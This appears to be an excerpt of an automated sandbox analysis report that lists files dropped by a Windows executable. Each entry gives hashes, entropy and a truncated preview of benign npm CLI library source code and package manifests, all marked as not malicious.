              Preview:const ansi = require('ansi-styles')..const colors = {. removed: ansi.red,. added: ansi.green,. header: ansi.yellow,. section: ansi.magenta,.}..function colorize (str, opts) {. let headerLength = (opts || {}).headerLength. if (typeof headerLength !== 'number' || Number.isNaN(headerLength)) {. headerLength = 2. }.. const color = (colorStr, colorId) => {. const { open, close } = colors[colorId]. // avoid highlighting the "\n" (would highlight till the end of the line). return colorStr.replace(/[^\n\r]+/g, open + '$&' + close). }.. // this RegExp will include all the `\n` chars into the lines, easier to join. const lines = ((typeof str === 'string' && str) || '').split(/^/m).. const start = color(lines.slice(0, headerLength).join(''), 'header'). const end = lines.slice(headerLength).join(''). .replace(/^-.*/gm, color('$&', 'removed')). .replace(/^\+.*/gm, color('$&', 'added')). .replace(/^@@.+@@/gm, color('$&', 'section')).. return start + end.}..module.e
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1459
              Entropy (8bit):4.600304668382302
              Encrypted:false
              SSDEEP:
              MD5:F9635A9598908DAB311FBF047209C652
              SHA1:799957D0A4590B694EF2457DBAA4C5C04B259EB5
              SHA-256:F78299230047EC400366763B35353E41565CF25A924538A47906FFF316C7ADD8
              SHA-512:641FF663D7711D11D417C78DB6FAC47BB364CE8BEDF500D1EC90BECC1EA8BE0A632CBFAC4927F45248ECAC4E690E6D83ACF99EB228A7B587E45C17C2F0E6DFCD
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "@npmcli/disparity-colors",. "version": "3.0.0",. "main": "lib/index.js",. "files": [. "bin/",. "lib/". ],. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "description": "Colorizes unified diff output",. "repository": {. "type": "git",. "url": "https://github.com/npm/disparity-colors.git". },. "keywords": [. "disparity",. "npm",. "npmcli",. "diff",. "char",. "unified",. "multiline",. "string",. "color",. "ansi",. "terminal",. "cli",. "tty". ],. "author": "GitHub Inc.",. "contributors": [. {. "name": "Ruy Adorno",. "url": "https://ruyadorno.com",. "twitter": "ruyadorno". }. ],. "license": "ISC",. "scripts": {. "lint": "eslint \"**/*.js\"",. "pretest": "npm run lint",. "test": "tap",. "snap": "tap",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Algol 68 source, ASCII text
              Category:dropped
              Size (bytes):528
              Entropy (8bit):4.420301569199014
              Encrypted:false
              SSDEEP:
              MD5:B4354F6B8F8E2F5D7F695EEC9131753F
              SHA1:F715742A9ECA366EE9F876155A4FF2247EC9439A
              SHA-256:9EFFC9EB07753C26041C78A42338687C9DBC3A2FE7580256277D1E6F9B6CE4E1
              SHA-512:AD1A535F946E56F26B0D0B8E299E15085F2E9F11F7F0AE69816466F1E93565CC641E7600A659F8C6C48C35E7C02899918AEFD61FA8E40EFE715B5826835DD005
              Malicious:false
              Reputation:unknown
              Preview:// given an input that may or may not be an object, return an object that has.// a copy of every defined property listed in 'copy'. if the input is not an.// object, assign it to the property named by 'wrap'.const getOptions = (input, { copy, wrap }) => {. const result = {}.. if (input && typeof input === 'object') {. for (const prop of copy) {. if (input[prop] !== undefined) {. result[prop] = input[prop]. }. }. } else {. result[wrap] = input. }.. return result.}..module.exports = getOptions.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):181
              Entropy (8bit):4.421558215340807
              Encrypted:false
              SSDEEP:
              MD5:FA6921F91A421D1681DF1B09EED61DB4
              SHA1:093D6E28561E89A93B28EF446C6CB26254F3E021
              SHA-256:3682E75CCD114A154EC490DB83CB92E4E81A7001F98551305CE8E1F78CEF3CBD
              SHA-512:755F746F64A33503E8E5023055CFCFB973E3FA0C5A6C92CF75FABBC1CE164097B3AF7B486CF3882D7CA63B36077611291C5A6E799603D36F5F93B790663B0152
              Malicious:false
              Reputation:unknown
              Preview:const semver = require('semver')..const satisfies = (range) => {. return semver.satisfies(process.version, range, { includePrerelease: true }).}..module.exports = {. satisfies,.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1084
              Entropy (8bit):5.1035625531374365
              Encrypted:false
              SSDEEP:
              MD5:EA817882455C03503F7D014A8F54F095
              SHA1:DD164BC611BCA7BA8EAD40EC4C2851081E5A16B9
              SHA-256:1E76029602AE9B21CC4E612DB2496D92FEBED882BA13BA745F8B3309E85F9D39
              SHA-512:0EA343D0E696BA27877DC0611766C526AA73F6E7AF46DF5A0F83840DC4C7851FB5837B7F6BDA8A014302BF877FE3B4B3E392B943CEFB3AF979E8AFC67559A5FF
              Malicious:false
              Reputation:unknown
              Preview:(The MIT License)..Copyright (c) 2011-2017 JP Richardson..Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files.(the 'Software'), to deal in the Software without restriction, including without limitation the rights to use, copy, modify,. merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE.WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS.OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,. ARISING FROM, OUT
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):3396
              Entropy (8bit):4.734214672238623
              Encrypted:false
              SSDEEP:
              MD5:EFE1987E99CBCE7C9792A4C2B7E61603
              SHA1:912B3DA9DE65A067CDEDBA8B4DE2510974D3905D
              SHA-256:A7D09952191CDE9205664FF85CD97EDF0B765AC0903105039C6C735249269861
              SHA-512:DD5CF4D28546A4BD14C304951DB2951FBB17C1A86225B13DABD2A0FC7A658419526FF534FFBCF7DE2C0CC6895E569C3DD95EFF16F383D5DA847C4F577DA1465B
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const { inspect } = require('util')..// adapted from node's internal/errors.// https://github.com/nodejs/node/blob/c8a04049/lib/internal/errors.js..// close copy of node's internal SystemError class..class SystemError {. constructor (code, prefix, context) {. // XXX context.code is undefined in all constructors used in cp/polyfill. // that may be a bug copied from node, maybe the constructor should use. // `code` not `errno`? nodejs/node#41104. let message = `${prefix}: ${context.syscall} returned ` +. `${context.code} (${context.message})`.. if (context.path !== undefined) {. message += ` ${context.path}`. }. if (context.dest !== undefined) {. message += ` => ${context.dest}`. }.. this.code = code. Object.defineProperties(this, {. name: {. value: 'SystemError',. enumerable: false,. writable: true,. configurable: true,. },. message: {. value: message,. enumer
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):695
              Entropy (8bit):4.702320567950967
              Encrypted:false
              SSDEEP:
              MD5:1B23509B8FB16BE962414E575C44F9E3
              SHA1:9CD971F3DA8FCA47C1245AD6545F9C82CBF7B6E1
              SHA-256:F92557B351461096D1E9E9DC5446E0D7241CC26FCA08B4627A1B00246D54FC73
              SHA-512:DA930C5C071082D496A1A58143ADC3D223A9EEB8E870470EE701AC91DFAAA3200814768D86310E1030AD7D2DC991A651BFE5F4E549E2FE8ECE872F565A6AC751
              Malicious:false
              Reputation:unknown
              Preview:const fs = require('fs/promises').const getOptions = require('../common/get-options.js').const node = require('../common/node.js').const polyfill = require('./polyfill.js')..// node 16.7.0 added fs.cp.const useNative = node.satisfies('>=16.7.0')..const cp = async (src, dest, opts) => {. const options = getOptions(opts, {. copy: ['dereference', 'errorOnExist', 'filter', 'force', 'preserveTimestamps', 'recursive'],. }).. // the polyfill is tested separately from this module, no need to hack. // process.version to try to trigger it just for coverage. // istanbul ignore next. return useNative. ? fs.cp(src, dest, options). : polyfill(src, dest, options).}..module.exports = cp.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):12241
              Entropy (8bit):4.841282946971032
              Encrypted:false
              SSDEEP:
              MD5:66146F2D7176F34B0D88E02DC6EB5625
              SHA1:262578F1B3AEF7FAEF99057B79C851D9359B66C7
              SHA-256:39F6E60D75218EB0B26DFBAA10B805778EE633502A6D1156D92CDB6C6E78BF37
              SHA-512:06449C788D2CA6BB9E21CE6A27033AB94469905766FC528B3663973E601AA5F7AE8638503A5B1AC51D9E5DCDF76DCD99B7A5C50BB50FB063B96E4EBA4FDD1787
              Malicious:false
              Reputation:unknown
              Preview:// this file is a modified version of the code in node 17.2.0.// which is, in turn, a modified version of the fs-extra module on npm.// node core changes:.// - Use of the assert module has been replaced with core's error system..// - All code related to the glob dependency has been removed..// - Bring your own custom fs module is not currently supported..// - Some basic code cleanup..// changes here:.// - remove all callback related code.// - drop sync support.// - change assertions back to non-internal methods (see options.js).// - throws ENOTDIR when rmdir gets an ENOENT for a path that exists in Windows.'use strict'..const {. ERR_FS_CP_DIR_TO_NON_DIR,. ERR_FS_CP_EEXIST,. ERR_FS_CP_EINVAL,. ERR_FS_CP_FIFO_PIPE,. ERR_FS_CP_NON_DIR_TO_DIR,. ERR_FS_CP_SOCKET,. ERR_FS_CP_SYMLINK_TO_SUBDIRECTORY,. ERR_FS_CP_UNKNOWN,. ERR_FS_EISDIR,. ERR_INVALID_ARG_TYPE,.} = require('./errors.js').const {. constants: {. errno: {. EEXIST,. EISDIR,. EINVAL,. ENOTDIR,. },
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):268
              Entropy (8bit):4.739810682613169
              Encrypted:false
              SSDEEP:
              MD5:4A67406015C9F032E4335E01B7DD85DA
              SHA1:A36654CDA5B70FCB6E85B9228BF340EA91BF6B10
              SHA-256:54747B38CB1F467BC5E50F1AF7388159186BFE594D85C68BB43F3DEB8325D2C3
              SHA-512:26B0B2DBFC521A733E65C940D10CD93B3503C612100DDF36EC8CED0F1B03C3E93FBABE44E1440F5A05CD20624297D51642AFA6299CE6EED10D578A8211ACD539
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const cp = require('./cp/index.js').const withTempDir = require('./with-temp-dir.js').const readdirScoped = require('./readdir-scoped.js').const moveFile = require('./move-file.js')..module.exports = {. cp,. withTempDir,. readdirScoped,. moveFile,.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2281
              Entropy (8bit):4.495908944389356
              Encrypted:false
              SSDEEP:
              MD5:236766FA9C36B989A6EEA3D6271C30A7
              SHA1:4C6989557E93132544C9D273F82AAD9E06F3C9D1
              SHA-256:0684A070ABD953942292192E65A81BC79D404A478AE7DE17BC61827CB464D5E2
              SHA-512:470A69DD7C4CB1D094AFA7D92052B57B0CEB90EB7723ACC174D08C95090473F38D5BDA9494085AAF4297696B7EE183F8EB96F47C7120882D5EC30960BBB48217
              Malicious:false
              Reputation:unknown
              Preview:const { dirname, join, resolve, relative, isAbsolute } = require('path').const fs = require('fs/promises')..const pathExists = async path => {. try {. await fs.access(path). return true. } catch (er) {. return er.code !== 'ENOENT'. }.}..const moveFile = async (source, destination, options = {}, root = true, symlinks = []) => {. if (!source || !destination) {. throw new TypeError('`source` and `destination` file required'). }.. options = {. overwrite: true,. ...options,. }.. if (!options.overwrite && await pathExists(destination)) {. throw new Error(`The destination file exists: ${destination}`). }.. await fs.mkdir(dirname(destination), { recursive: true }).. try {. await fs.rename(source, destination). } catch (error) {. if (error.code === 'EXDEV' || error.code === 'EPERM') {. const sourceStat = await fs.lstat(source). if (sourceStat.isDirectory()) {. const files = await fs.readdir(source). await Promise.all(files.map((file
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):431
              Entropy (8bit):4.430267199435946
              Encrypted:false
              SSDEEP:
              MD5:CCECE4CD35478408100F4DD41AFAFDD5
              SHA1:39B656DECDA58C663A0E684E0EF8B996035BBA0C
              SHA-256:5AEB27AD14FCAF82C879DF66B79068D670C9E10E91E0483D0B72FDC87C00658C
              SHA-512:C030E1067224262884767BA34E4FE2C731F67237F82E8BBFA93926720F38FE5AE352D69910BB9B9742A4D19F90483F8F5FB2BA80B5CEAF55C2748F955032FD72
              Malicious:false
              Reputation:unknown
              Preview:const { readdir } = require('fs/promises').const { join } = require('path')..const readdirScoped = async (dir) => {. const results = [].. for (const item of await readdir(dir)) {. if (item.startsWith('@')) {. for (const scopedItem of await readdir(join(dir, item))) {. results.push(join(item, scopedItem)). }. } else {. results.push(item). }. }.. return results.}..module.exports = readdirScoped.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):900
              Entropy (8bit):4.5620240916231
              Encrypted:false
              SSDEEP:
              MD5:519028A7FFD39BC64E5EE9BD9B80316B
              SHA1:FE5DE6222CE6C79D4A53EF8F5457574C25809D0C
              SHA-256:866D28B80E53A2A09985C23D99DBAC867487DBD5DFDC8CF3DF5C844C6BEAFBF8
              SHA-512:49DAE18208148F0DCC7C4536A80171214A1E13BD203B6DEB86081BD0FD2322AE77B821175AB266DAFDD946D8D5F4523C16ADC3F32CF8A9DB7633EC3A8C4B87C4
              Malicious:false
              Reputation:unknown
              Preview:const { join, sep } = require('path')..const getOptions = require('./common/get-options.js').const { mkdir, mkdtemp, rm } = require('fs/promises')..// create a temp directory, ensure its permissions match its parent, then call.// the supplied function passing it the path to the directory. clean up after.// the function finishes, whether it throws or not.const withTempDir = async (root, fn, opts) => {. const options = getOptions(opts, {. copy: ['tmpPrefix'],. }). // create the directory. await mkdir(root, { recursive: true }).. const target = await mkdtemp(join(`${root}${sep}`, options.tmpPrefix || '')). let err. let result.. try {. result = await fn(target). } catch (_err) {. err = _err. }.. try {. await rm(target, { force: true, recursive: true }). } catch {. // ignore errors. }.. if (err) {. throw err. }.. return result.}..module.exports = withTempDir.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1160
              Entropy (8bit):4.6459893237017065
              Encrypted:false
              SSDEEP:
              MD5:DD35080750793074568B75E54C645B16
              SHA1:9601F97992448C68D8F87AB9B2535C717FF01868
              SHA-256:F055CDE11E9FCC5328E05268F5337621EDA31A71A9AF1E609039AE2F0B5155EA
              SHA-512:02399957704469276DC3D534E2F1FCDC27857301BD08A1604F0D4EEFC587EF9DB114B49E3C0C7868CEC3AE60CD70F1F6A90F5066FAA77010EB2A2127A936D8C9
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "@npmcli/fs",. "version": "3.1.0",. "description": "filesystem utilities for the npm cli",. "main": "lib/index.js",. "files": [. "bin/",. "lib/". ],. "scripts": {. "snap": "tap",. "test": "tap",. "npmclilint": "npmcli-lint",. "lint": "eslint \"**/*.js\"",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint",. "postsnap": "npm run lintfix --",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/fs.git". },. "keywords": [. "npm",. "oss". ],. "author": "GitHub Inc.",. "license": "ISC",. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.8.0",. "tap": "^16.0.1". },. "dependencies": {. "semver": "^7.3.5". },. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "templateOSS": {. "//@npmcli/template-oss": "This file is partially managed by @n
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4937
              Entropy (8bit):4.809782502119511
              Encrypted:false
              SSDEEP:
              MD5:8DD7842C3F02A5898F39F5AF08E6B38D
              SHA1:A8C18F54C4ACD285B11448D122AC6A4489C52066
              SHA-256:459EC3DB39773683346D39233C9CEC9176667E1785240F6C861D276DDF9E9B8A
              SHA-512:82FB49E5ED8636D02BA65EF26D580A040CD4CD95483E03552E4A58454076009447821012102ECA4B14E7B7ABA4235E9279591F9994E7A963EC5B4D82EF76EE2D
              Malicious:false
              Reputation:unknown
              Preview:// The goal here is to minimize both git workload and.// the number of refs we download over the network..//.// Every method ends up with the checked out working dir.// at the specified ref, and resolves with the git sha...// Only certain whitelisted hosts get shallow cloning..// Many hosts (including GHE) don't always support it..// A failed shallow fetch takes a LOT longer than a full.// fetch in most cases, so we skip it entirely..// Set opts.gitShallow = true/false to force this behavior.// one way or the other..const shallowHosts = new Set([. 'github.com',. 'gist.github.com',. 'gitlab.com',. 'bitbucket.com',. 'bitbucket.org',.]).// we have to use url.parse until we add the same shim that hosted-git-info has.// to handle scp:// urls.const { parse } = require('url') // eslint-disable-line node/no-deprecated-api.const path = require('path')..const getRevs = require('./revs.js').const spawn = require('./spawn.js').const { isWindows } = require('./utils.js')..const pickManifest =
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):600
              Entropy (8bit):4.4892497015755115
              Encrypted:false
              SSDEEP:
              MD5:449CDF05E1A78F45B03D7FD842AF47BC
              SHA1:76D4ACBD14733CD9B9E5B1F5F5B783E9DD1E25A0
              SHA-256:7320C74C44840322B20480B8D340FD079BBAA2E5267FE60889D990D6A29A2849
              SHA-512:6FE6935B0AB0F8972B83DAC7810911E3284031A75C37905911D13CF667CC9C3A518E4B6D2C9AA917BACF7E47FC651E06098F97A39B20138BEEAD3AA5EB0074F9
              Malicious:false
              Reputation:unknown
              Preview:.const maxRetry = 3..class GitError extends Error {. shouldRetry () {. return false. }.}..class GitConnectionError extends GitError {. constructor (message) {. super('A git connection error occurred'). }.. shouldRetry (number) {. return number < maxRetry. }.}..class GitPathspecError extends GitError {. constructor (message) {. super('The git reference could not be found'). }.}..class GitUnknownError extends GitError {. constructor (message) {. super('An unknown git error occurred'). }.}..module.exports = {. GitConnectionError,. GitPathspecError,. GitUnknownError,.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):316
              Entropy (8bit):4.282936836117496
              Encrypted:false
              SSDEEP:
              MD5:431301ED7209995FD1C85BEA39672306
              SHA1:757C1E3B9AC92DE24E568D07476220F55FC05DAD
              SHA-256:60B0559E699B01AE777E941CAC75A8B8BD541F524BEA8BA05B5C9055250733F3
              SHA-512:A5C9B8B093E3E17106FE0B62C17984991DB2673F6A3CEB90A859F7ADA4D46DEDAAC90995FB367E9D0389DC3E55C8459A90770069C935B0C5723470596B9C7489
              Malicious:false
              Reputation:unknown
              Preview:const is = require('./is.js').const { dirname } = require('path')..module.exports = async ({ cwd = process.cwd(), root } = {}) => {. while (true) {. if (await is({ cwd })) {. return cwd. }. const next = dirname(cwd). if (cwd === root || cwd === next) {. return null. }. cwd = next. }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):242
              Entropy (8bit):4.519411012565017
              Encrypted:false
              SSDEEP:
              MD5:4290EF856C1871F9CAC149342141414C
              SHA1:3AF8E9638CA36CF72646CF6A7F5B34A11B01A526
              SHA-256:CE74E39939A74D25CBA6C789BA1CB143AF903884829E6CB105D2F1D69351D324
              SHA-512:D1AFD123C285D7FF79D65106D92B3ABF966262ECD22165BE46FBD7174AB97DB15CC57A8F4A98116AA7DC3D4146A059E8F8EEDFC34389ECEFEDFD234DD9637134
              Malicious:false
              Reputation:unknown
              Preview:module.exports = {. clone: require('./clone.js'),. revs: require('./revs.js'),. spawn: require('./spawn.js'),. is: require('./is.js'),. find: require('./find.js'),. isClean: require('./is-clean.js'),. errors: require('./errors.js'),.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):222
              Entropy (8bit):4.786376060313864
              Encrypted:false
              SSDEEP:
              MD5:A8D307C6A8A55F39A52958AA4D70E60E
              SHA1:5C5F3C069C9BF2E353D099B189C61B668DCDEA55
              SHA-256:886581ADD04269EA242570EA702A14A2A1419914ECAA504DCFB288E6B85903EC
              SHA-512:CD9F639E3B14F98AED9B78512A6A7622309E6964A2CFB3224385671F77D20041E223B817A0F78F38845CE4F25D6B5FC48F4F1392FC9441D5325AC05A4DD081BE
              Malicious:false
              Reputation:unknown
              Preview:const spawn = require('./spawn.js')..module.exports = (opts = {}) =>. spawn(['status', '--porcelain=v1', '-uno'], opts). .then(res => !res.stdout.trim().split(/\r?\n+/). .map(l => l.trim()).filter(l => l).length).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):271
              Entropy (8bit):4.682120137144458
              Encrypted:false
              SSDEEP:
              MD5:852E252B652B1E631F19DF0CCC9B9558
              SHA1:26E6AEC58F71567455C634BBDCDD414FB3A90D80
              SHA-256:1BC3941620B55E3FEE7BA4804D3800A66D8E74D67FAC34F00A74F491C370FDA8
              SHA-512:E5EF9953030FD4FB419FD6D8E6FF4FC769B733A8C0A72A30580B1F062DB0FC15FAC292070C7A30097B089FDFFE7EFAA876E3D87CC393B147D970F490D6C2D8F1
              Malicious:false
              Reputation:unknown
              Preview:// not an airtight indicator, but a good gut-check to even bother trying.const { promisify } = require('util').const fs = require('fs').const stat = promisify(fs.stat).module.exports = ({ cwd = process.cwd() } = {}) =>. stat(cwd + '/.git').then(() => true, () => false).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):2828
              Entropy (8bit):5.077103110025512
              Encrypted:false
              SSDEEP:
              MD5:F6707C0F0122704A3967C18BA54E0E85
              SHA1:B29D9E84FB6E34C7802319BCC28A7BFF7EE1B4EA
              SHA-256:8C59E9DD26ADB98C4F3129CDF82FBFA46F7CCE4279F5FDC8CD062CEF1A52371B
              SHA-512:0DCC2E6AF388038DBCAA7B3FBBE53D2DFCF057AC5E71A3FB42F839C571419AC88E5BF070367403FAE396F46252ACE091A762CA1702A51D82657ACF17B2E56139
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.CIContextProvider = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const make_fetch_happen_1 = __importDefault(require("make-fetch-happen"));.// Collection of all the CI-specific providers we have implemented.const providers = [getGHAToken, getEnv
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):837
              Entropy (8bit):5.049365446158185
              Encrypted:false
              SSDEEP:
              MD5:594D593DD1820112D8EDF1F7ECCF418C
              SHA1:276681A8C7EF08D62B88432957EEE9C404F829D9
              SHA-256:CE801C2B4439FAAD508A9CBB84C2BBE841A38CD54F46C849C6284E4F28A8AFA0
              SHA-512:3F737D996FAA8281403B7355001B5E481146A670267B5B7CA99DC5E2127CA2801B3CE157A51B489CC1653DEFEC82C0E28B81FD3F1814A3CC795A09C9AB03F12A
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.CIContextProvider = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.var ci_1 = require("./ci");.Object.defineProperty(exports, "CIContextProvider", { enumerable: true, get: function () { return ci_1.CIContextProvider; } });.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):5.090293179071992
              Encrypted:false
              SSDEEP:
              MD5:D748F6C1728AB56E36F03DCFE93D4BE2
              SHA1:6855B9FCD0FEF5D05DE437A7E0DFAA37512FEEAB
              SHA-256:E50EC700A3C52848B9E495B6B5B500A65BFDA28A21F6C1C786411BAAE1B5D909
              SHA-512:07DF3D3F16D622B8369CE99774B70E1FE7BCDB1626745946BA755AF06400216A9400F87EEBD03BF49C7B67284783746D6B8D7BDC3138332CB3E4DCD5AAFA73DE
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.TSAWitness = exports.RekorWitness = exports.DEFAULT_REKOR_URL = exports.FulcioSigner = exports.DEFAULT_FULCIO_URL = exports.CIContextProvider = exports.InternalError = exports.MessageSignatureBundleBuilder = exports.DSSEBundleBuilder = void 0;.var bundler_1 = require("./bundler");.Object.defineProperty(exports, "DSSEBundleBuilder", { enumerable: true, get: function () { return bundler_1.DSSEBundleBuilder; } });.Object.defineProperty(exports, "MessageSignatureBundleBuilder", { enumerable: true, get: function () { return bundler_1.MessageSignatureBundleBuilder; } });.var error_1 = require("./error");.Object.defineProperty(exports, "InternalError", { enumerable: true, get: function () { return error_1.InternalError; } });.var identity_1 = require("./identity");.Object.defineProperty(exports, "CIContextProvider", { enumerable: true, get: function () { return identity_1.CIContextProvider; } });.var signer_1
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):2261
              Entropy (8bit):4.718071765008161
              Encrypted:false
              SSDEEP:
              MD5:4F97271B9F6AA8F9080258D59035FA59
              SHA1:DD3BEB2BD17A50CE4EF36B378C1D7E316B17D2DF
              SHA-256:E5AE84BD97E0A19F35B3B706668A98930CD9B80498C7D732ED4BF878EEA822D9
              SHA-512:5B1E7781D5FA505F06C78E093C573C65AB3AC138DC77C48B7B0105850D09C821C16807DD244A66056B5C7616626B4648E88F58B71131CC440846514CCA051381
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.CAClient = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const error_1 = require("../../error");.const fulcio_1 = require("../../external/fulcio");.class CAClient {. constructor(options) {. this.fulcio = new fulcio_1.Fulcio({. baseURL: options.fulcioBaseURL,. retry: options.retry,. timeout: options.timeout,. });. }. async creat
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):1694
              Entropy (8bit):5.00675174284196
              Encrypted:false
              SSDEEP:
              MD5:FA6F7C97254FF22E1EC5D0267A746416
              SHA1:2AB9A25B153FDD5DB5255CCADCCC77D82E81B47F
              SHA-256:03BBBBE11E2EB159CD37CA3A0B4E90E62537083F8D6DDC7DBC1126FCCE91C212
              SHA-512:CE33FDA40CFC894A3BC290D8B0FD1A5924358ED070509813BBE6A8691EFD9D8AC52551B8D2A88D7248AA0A1E22B6046DB6DF3C90304CC1CF59C13E5655D808C9
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.EphemeralSigner = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const crypto_1 = __importDefault(require("crypto"));.const EC_KEYPAIR_TYPE = 'ec';.const P256_CURVE = 'P-256';.// Signer implementation which uses an ephemeral keypair to sign artifa
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):3485
              Entropy (8bit):4.739217181674002
              Encrypted:false
              SSDEEP:
              MD5:F8B0D0348D57122FE2AAAB09420172C3
              SHA1:549AFC9FABA8D5C77D2473C79B72895FD8DC2B2A
              SHA-256:CC4124686B7B6D10F3FE1128F22714920852B639F939F58FF290701821ECE3EC
              SHA-512:E378BB62EAF608CBAA4AF1FD1029C5D65C54B57B412F8674C51086F23698F0DD437C630C02711B9F6A9D77AFAEE2139D00CB39C84CAA63E382063F74B40C0086
              Malicious:false
              Reputation:unknown
